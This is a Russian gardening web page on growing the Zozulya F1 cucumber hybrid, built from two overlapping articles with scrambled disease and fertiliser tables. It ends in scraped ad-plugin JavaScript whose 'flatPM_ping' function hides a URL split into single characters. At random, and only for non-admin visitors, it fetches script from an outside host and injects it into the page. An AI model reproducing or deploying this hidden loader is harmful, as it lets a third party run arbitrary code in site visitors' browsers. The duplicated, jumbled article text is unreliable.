  2. Калибровка. Процесс схож с посевом огурцов в грунт. Семена заливают чистой водой или смесью с марганцовкой. Через некоторое время воду выливают. Семена, которые поднялись на поверхность воды, выбрасывают, оставляя только утонувшие.
  3. Проращивание. Семена заворачивают во влажную ткань и кладут на несколько дней в теплое место с температурой +30 °С. Нельзя помещать их в марлевую ткань, так как корешки ростков будут путаться и застревать, что усложнит задачу и повысит возможность повреждения семян.
  4. Посадка. Семена сеют в специальные стаканчики со смесью земли. С момента посева до появления первых всходов поддерживают температуру в +30 °С. Когда появится первый листок, ее понижают до +20 °С для предотвращения вытягивания рассады.

Кусты регулярно поливают и проветривают. Важно, чтобы световой день был около 13 часов. Через месяц рассада готова к высадке в теплицу. На специальных рядах выкапывают лунки глубиной 15 см, добавляют в них перегной и удобрения. Рассаду аккуратно вытряхивают из горшков и помещают в ямки. После засыпают землей и слегка утрамбовывают.

Выращивание и уход

Чтобы гибрид Зозуля дал хороший урожай, важно соблюдать правила агротехники. Огуречные плети следует подвязывать к опорам, сорняки — убирать, землю — рыхлить. Обязательно поливают растения, проводят подкормку посевов витаминами и удобрениями.

Гибрид требователен к влаге, поэтому расход воды — по 1 л на взрослый куст. Результат будет лучше, если добавлять комбинированные органико-минеральные подкормки и удобрения. Их вносят под корень и по листьям. Гибрид хорошо отзывается на концентрированный куриный помет.

Приготовить его просто: сухой помет заливают водой в соотношении 1:1. Сосуд с этой смесью закрывают и настаивают неделю. Смесь используют в разведенном виде.

Особенности выращивания и возможные трудности

Чтобы ранние всходы не страдали от перепадов температуры, рекомендуется накрывать рассаду сразу после высадки. Так как огурцы любят влагу, рассаду поливают обильно. Воду настаивают несколько дней, чтобы она нагрелась — холодный полив вредит растению. Переизбыток влаги может отрицательно повлиять на гибрид, спровоцировав болезни.

Лучшее время для полива — утро или вечер. Рыхление проводят для того, чтобы давать воздух корневой системе, и для предотвращения питания сорняков важными питательными веществами из почвы. Для развития и улучшения куста прищипывают центральный росток. Этот способ спасает огурцы и от бесплодия.

Справка. Удобряют каждые две недели.

Болезни и вредители

Гибрид имеет хорошую устойчивость перед оливковой пятнистостью и корневой гнилью. Но существуют другие заболевания, способные поразить растение. К ним относятся мучнистая роса, аскохитоз и бактериоз. Опасны грибковые заболевания из-за повышенной влажности в теплице.

Для профилактики этих заболеваний семена протравливают фунгицидами «Винцит», «Сапроль». При выращивании в теплицах стены и потолок обрабатывают раствором формалина.

Если болезнь уже распространилась, пораженные листья удаляют и сжигают, а растения опрыскивают бордоской жидкостью или раствором мочевины с медным купоросом, стебли натирают смесью меди и мела.

Из народных методов борьбы с грибковыми заболеваниями пользуются популярностью:

  • обработка кисломолочной сывороткой, разбавленной холодной водой в соотношении 1:10;
  • йодный раствор — 25 мл йода растворяют в 10 л воды;
  • отвар лука — 0,7 л шелухи кипятят одну минуту в 10 л воды, настаивают 12-15 часов, разводят водой в соотношении 1:4, затем опрыскивают растения и поливают грунт.

От нашествия тли, иногда поражающей грядки огурцов, огородники применяют инсектициды («Децис»).

Сбор и применение урожая

Сбор происходит 1 раз в 5 дней для стимуляции образования новых плодов. Урожай используют в основном для салатов. Также он пригоден к засолу и консервации.

Преимущества и недостатки

К достоинствам Зозули относят ранние сроки созревания, простоту в уходе за счет отсутствия необходимости привлечения насекомых для опыления. Другие плюсы — неприхотливость и устойчивость перед многими заболеваниями, высокая урожайность и сочный вкус плодов.

Недостатков у гибрида немного. К ним относится то, что для повышенной урожайности необходимо выращивать растение только в защищенном и специально подготовленном грунте.

Отзывы

Садоводы отзываются о гибриде Зозуля положительно и рекомендуют выращивать его тем, кто готов выделять время и силы для ухода за растениями.

Галина, г. Белгород: «Мы выращивали такие огурцы прошлым летом, салаты были нереально вкусные. Я очень рада, что смогла найти этот гибрид. Но сначала у меня не получалось их выращивать, постоянно были какие-то проблемы. То урожайность маленькая, то плоды небольшие. Как только я начала внимательнее следить за растениями, все сразу улучшилось. Я очень рада, что могу наслаждаться таким нежным вкусом».

Наталья, г. Санкт-Петербург: «Я ежегодно высаживаю семена в открытый грунт. Первые плоды у меня вырастают длинные, очень ровные. Когда куст перестает нести плоды, они уже остаточно появляются кривыми. Но вообще-то этот гибрид рекомендован для тепличной высадки».

Елена, г. Москва: «Эти огурцы я использую только для салата, потому что они большие, длинные, а главное, сочные вырастают. Когда мы их посадили, и они начали расти и завязываться, мы сразу обрадовались, что огурцов будет очень много. Это оказалось правдой, семян мы немного посадили, плодов получилось много, и урожай мы собрали неплохой».

Заключение

Гибрид Зозуля — один из наиболее популярных и пригодных для сбора большого урожая. У огурцов приятный вкус и быстрый рост. Плюсов и достоинств у гибрида больше, чем недостатков. Поэтому фермеры, желающие вырастить вкусные и сочные огурцы, выбирают этот гибрид.

Сорт огурцов Зозуля F1 — проверенный временем гибрид

Современные огородники активно используют парники и теплицы, чтобы получить урожай как можно раньше. Специально для закрытого грунта создано множество сортов, а селекционная работа постоянно продолжается. Огурец Зозуля F1 выведен именно для этих целей более 30 лет назад. Несмотря на изобилие новых гибридов, Зозуля не сдаёт позиций и все так же любима многими овощеводами.

Описание сорта

Огурец Зозуля F1 был выведен отечественными селекционерами на базе Овощной опытной станции имени В.И. Эдельштейна. Сорт подходит для большинства регионов. Может выращиваться в открытом грунте, но стабильно высокие урожаи даёт лишь под плёночным укрытием.

Зозуля — гибрид раннего срока созревания. Первые огурчики можно снимать через 42–48 дней после посадки. В начале плодоношения урожайность небольшая — 8–16 кг с квадратного метра. Однако через месяц образование завязи набирает обороты и с одного квадратного метра можно собрать до 20 кг плодов.

Плоды вырастают длиной 14–24 см и массой 150–300 г. Форма огурцов цилиндрическая, иногда с небольшим изгибом. Кожица тонкая, насыщенно-зелёного цвета со слабовыраженными бороздками и редкими бугорками. Мякоть с мелкими семенами, плотная и ароматная. Плоды долго сохраняют товарный вид и не перерастают.

Плоды огурца сорта Зозуля вырастают до 24 см

Эти огурцы очень хороши в свежем виде для салатов. Для солений они не подходят, т. к. быстро становятся мягкими. Исключение составляют лишь рецепты быстрого маринования, так называемые малосольные огурцы, где Зозуля вполне уместна. Хранить собранные огурцы можно 3–5 дней в холодильнике или подвале. Длительного хранения Зозуля не выдерживает, плоды сморщиваются и теряют свои вкусовые качества.

Кусты у Зозули слабоплетистые, практически не образуют пасынков, что значительно упрощает уход за ними. Цветки частично партенокарпические и не требуют для опыления участия насекомых. Растения сильнорослые. Для нормального развития их высаживают не более 2–3 штук на метр квадратный.

Партенокарпический огурец — такой сорт или гибрид, который способен образовывать плоды без опыления.

Огурцы этого сорта неприхотливы, отзывчивы к подкормкам, без ущерба для роста переносят перепады температуры. Устойчивы к оливковой пятнистости, огуречной мозаике и корневым гнилям.

Сравнительная таблица достоинств и недостатков сорта Зозуля F1

Достоинства

Ранние сроки созревания урожая

Простота в уходе за счёт отсутствия необходимости пасынкования и привлечения насекомых-опылителей

Неприхотливость и устойчивость к некоторым заболеваниям

Нежный вкус плодов

Видео: гибрид Зозуля F1

Выращивание огурцов

Вырастить Зозулю можно двумя способами: посеять семена сразу в грунт или через рассаду. Рассадный способ более трудоёмок, но позволяет получить крепкие растения и самый ранний урожай.

Важно! Огурцы Зозуля — гибридный сорт, поэтому не стоит пытаться вырастить урожай из собственноручно собранных семян.

Выбор места и подготовка почвы

Для теплицы под огурцы выбирают солнечный, ровный участок, желательно защищённый от северного ветра. Почва должна быть с нейтральной кислотно-щелочной реакцией, лёгкой и плодородной. Если качество грунта оставляет желать лучшего, теплицу заполняют смесью из торфяной, дерновой земли и перегноя в соотношении 5:2:3. Такой субстрат укладывают слоем не менее 15–20 см.

Накануне посадки любой грунт обеззараживают. Для этого в 10 л горячей воды растворяют 3 г марганцовки и лейкой с распылителем обильно поливают землю.

Совет! Удобнее всего сажать огурцы в неглубокие рядки с междурядьем 50–60 см.

В теплице для огурцов создаётся идеальный микроклимат

Посев семян сразу в грунт

Под плёночными укрытиями такой метод применяют довольно редко, однако, если нет возможности вырастить рассаду, им вполне можно пользоваться.

Семена перед посевом заливают водой на 30–60 минут. Все всплывшие семечки выбрасывают, они всё равно не прорастут, а утонувшие прополаскивают, заворачивают во влажную тряпочку и оставляют в теплом месте на 1–3 дня. Как только проклюнутся ростки, приступают к посеву.

В рядках делают лунки через каждые 30–35 см. На дно каждой ямки высыпают горсть перегноя, по 0,5 ч. л. суперфосфата и калийной соли, после чего выливают туда же 0,3–0,5 литра воды. Когда влага впитается, высевают по три семечка и присыпают сухой землёй.

Важно! Огурцы начинают сеять только тогда, когда воздух в теплице прогреется до +20–25 градусов.

Проросшие огурцы прореживают, оставляя в лунке по одному самому сильному растению.

Выращивание огурцов рассадой

При рассадном методе выращивания важно, чтобы каждое семечко взошло и превратилось в полноценное растение. Для этого подготовку посадочного материала начинают задолго до посева. Семена должны пройти такие этапы:

Прогревание

Часто случается, что даже хорошие семена огурцов не хотят всходить. Чтобы пробудить их к жизни, применяют прогревание. За 1,5–2 месяца до посева пакетики с огурцами кладут поближе к отопительным приборам, там, где температура держится в районе 27–30 градусов. Процесс можно сократить до 2–3 дней, выдерживая посадочный материал при температуре 40 градусов. Прогревание способствует появлению дружных всходов, увеличивает количество женских цветков на кустах.

Калибровка

Калибровку проводят так же, как и при посеве огурцов в грунт. Семена заливают чистой водой или светло-розовым раствором марганцовки, через час сливают воду вместе со всплывшими нежизнеспособными семечками.

Проращивание

Откалиброванные огурцы заворачивают во влажную ткань и оставляют на несколько дней при температуре 28–30 градусов до появления ростков.

Совет! Не стоит заворачивать семена в марлю. Корешки ростков очень быстро запутаются в крупных ячейках материала и будет трудно извлечь их оттуда не повредив.

Подготовленные семена сеют в стаканчики или крупные кассеты, наполненные тепличной землесмесью. С момента посева и до появления всходов поддерживают температуру 25–28 градусов. Когда сеянцы выпустят первый настоящий листок, температуру понижают до 20–22 градусов для предотвращения вытягивания рассады.

Подрастающие кустики регулярно поливают, следят, чтобы световой день был не менее 13–15 часов, и периодически проветривают. Через 20–25 дней рассада Зозули готова к высадке в теплицу. Идеальное время для посадки — третья декада мая.

На рядках выкапывают лунки глубиной 12–15 см, добавляют в каждую немного перегноя, по 0,5 ч. л. суперфосфата и калийной соли, обильно заливают водой по самые края. Рассаду аккуратно вытряхивают из горшочков, не нарушая земляной ком, и помещают в ямки. Засыпают землёй, слегка утрамбовывают. Корневая шейка растений должна остаться на прежнем уровне, то есть её не нужно заглублять или располагать выше уровня грунта.

Через 20–25 дней рассада Зозули готова к высадке в теплицу

Уход за Зозулей

Чтобы огурцы давали обильный урожай, необходимо соблюдать несложные правила:

  1. Огуречные плети обязательно подвязывают к опорам.
  2. Междурядья содержат чистыми от сорняков и регулярно неглубоко рыхлят.
  3. Растения на протяжении всего сезона обильно поливают.
  4. Проводят подкормки минеральными удобрениями и органикой.
  5. Раз в 3–5 дней снимают урожай, т. к. частые сборки стимулируют образование новых огурчиков.

Полив

Огурцы Зозуля очень требовательны к влаге. Даже непродолжительная засуха снижает количество завязи. На одно молодое растение за один полив расходуют 0,5 л воды, а на взрослый куст 1 л. До цветения грядки увлажняют каждые 5–7 дней. Когда распустятся первые цветы и начнут завязываться огурчики — каждые 2–4 дня.

Совет! Часто плоды огурцов горчат. Чтобы этого не произошло, не допускают пересыхания почвы и поливают грядки только тёплой водой. Холодная вода из скважины или колодца способствует появлению горечи.

Подкормка

Зозуля очень отзывчива к удобрению. Наилучший результат дают комбинированные органико-минеральные подкормки. Рекомендуется вносить питательные вещества не только под корень, но и по листу.

Лучшие препараты для подкормки ранних огурцов:

  • нитрофоска;
  • сульфат калия;
  • аммиачная селитра;
  • мочевина;
  • настой куриного помёта.

На заметку! Концентрированный настой куриного помета приготовить очень просто. Сухой помет заливают водой 1:1, плотно закрывают тару и настаивают 3–7 дней. Используют только в разведённом виде.

Таблица: схема подкормок огурцов

Чем подкармливать

Нитрофоска, куриный помёт

В фазе 1 настоящего листка, 2–2,5 литра под каждый куст.

Сульфат калия, куриный помет

Мочевина или аммиачная селитра

Недостатки
Для обильного плодоношения необходимо выращивать только в защищённом грунте
Непригодность плодов к засолке
Как приготовить удобрение Когда и как вносить
Растворить в 10 л воды 1 ст. л. нитрофоски и 1 стакан жидкого настоя помёта. На 10 л воды 1 ч. л. сульфата калия и 2 стакана помёта. В фазе 2 настоящего листка, 2–2,5 литра под каждый куст; вторую обработку проводить через 2–3 недели после предыдущей, вносить подкормку под корень.
На выбор: 10 г селитры или 20 г мочевины на 5 л воды. В начале цветения вечером опрыскать растения.

Фаза настоящих листьев характеризуется появлением листочков, характерных именно для того или иного растения

Болезни и вредители огурцов Зозуля

Этот гибрид не поражают такие недуги, как оливковая пятнистость, корневая гниль, вирус огуречной мозаики. Однако растения могут пострадать от аскохитоза, антракноза, бактериоза, ложной и настоящей мучнистой росы. В теплицах огурцы особенно подвержены грибковым заболеваниям за счёт повышенной температуры и влажности.

Таблица: болезни сорта и меры борьбы с ними

Болезнь

На стебле и черешках листьев водянистые пятна с чёрными точками, стебель вокруг сухой, мочалистый. На листве обширные бурые пятна с чёрными точками.

Ложная мучнистая роса

Признаки Причины возникновения Профилактика и лечение
Аскохитоз Повышенная влажность, ослабленные растения. Проветривание теплицы, сжигание остатков больных растений, обработки фунгицидами.
Листовые пластинки покрываются массой округлых бурых пятен, на стебле вдавленные бурые области. Плоды горькие, очень быстро гниют. Высокая влажность при температуре +22–28 градусов.
Коричневые угловатые пятнышки по листьям, на месте которых образуются дыры. Плоды водянистые, искривлённые, с язвами. Заражённые семена, высокая влажность в сочетании с низкой температурой. Посев только протравленных семян, поддерживание оптимального микроклимата в теплице, опрыскивание бордоской жидкостью 1% (10 г медного купороса и 10–12 г извести на 1 л воды).
На листьях жёлтые пятна с фиолетовым налётом. Впоследствии лист выворачивается наружу и засыхает. Влажность 90–100% в сочетании с температурой +19–22 градуса и высокой солнечной активностью. Заражённые семена. Посев только протравленных семян, поддерживание оптимального микроклимата в теплице, обработки фунгицидами.
На нижней стороне листа появляется белый налёт, который переходит на внешнюю сторону и со временем темнеет. Плоды горькие, уродливые. Резкие перепады температуры и освещённости, заражённая земля или посевной материал. Дезинфекция теплицы, протравливание семян, поддержание стабильного микроклимата, опрыскивание сильнодействующими фунгицидами.
Зеленоватых или чёрных насекомых видно невооружённым глазом. Листья становятся бугристыми, скручиваются. Растение останавливается в росте. В теплице тля появляется довольно редко, в основном заносится туда с больной рассадой. Опрыскивание инсектицидами Децис, Арриво.

Фотогалерея: внешний вид недугов Зозули

Таблица: самые эффективные препараты для борьбы с болезнями огурцов

Название препарата От каких болезней эффективен Дозировка и приготовление Способы обработки
Ложная и настоящая мучнистая роса 1 ампулу эмульсии развести в 10 л воды Три обработки с интервалом 10–14 дней
Антракноз, ложная мучнистая роса 20 г развести в 10 л воды Три обработки через 10–14 дней
Фундазол Серая и корневая гниль, пятнистость, мучнистая роса 10 г на 10 л воды Две обработки с интервалом 1–2 недели
Ридомил голд Альтернариоз, пероноспороз, фитофтороз 50 г развести в 10 л воды Две — три обработки через 10–14 дней
Арриво Тля 5 мл на 10 л воды Две обработки за сезон

Отзывы об огурцах Зозуля F1

Огурцы Зозуля F1 выращиваем на даче каждый год. Сначала в конце апреля семена замачиваем под мокрой марлей до появления первых ростков, затем высаживаем в специально подготовленные домашние ящики и уже в конце мая садим в теплицу.

маргаритки

http://otzovik.com/review_1170254.html

Длинные и вкусные салатные огурцы — это старый сорт Зозуля.

Oxata**K**

Я каждый год сажаю в открытый грунт. первые огурцы вырастают нормальными-длинными и ровными. Кривыми они могут вырастать в конце плодоношения. Но вообще-то это сорт рекомендован для теплиц.

Ирэн

https://otvet.mail.ru/question/89805642

Гибрид Зозуля можно смело рекомендовать как начинающим, так и опытным огородникам. Неприхотливость, стабильная урожайность и длительное плодоношение сделали этот сорт одним из самых популярных.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};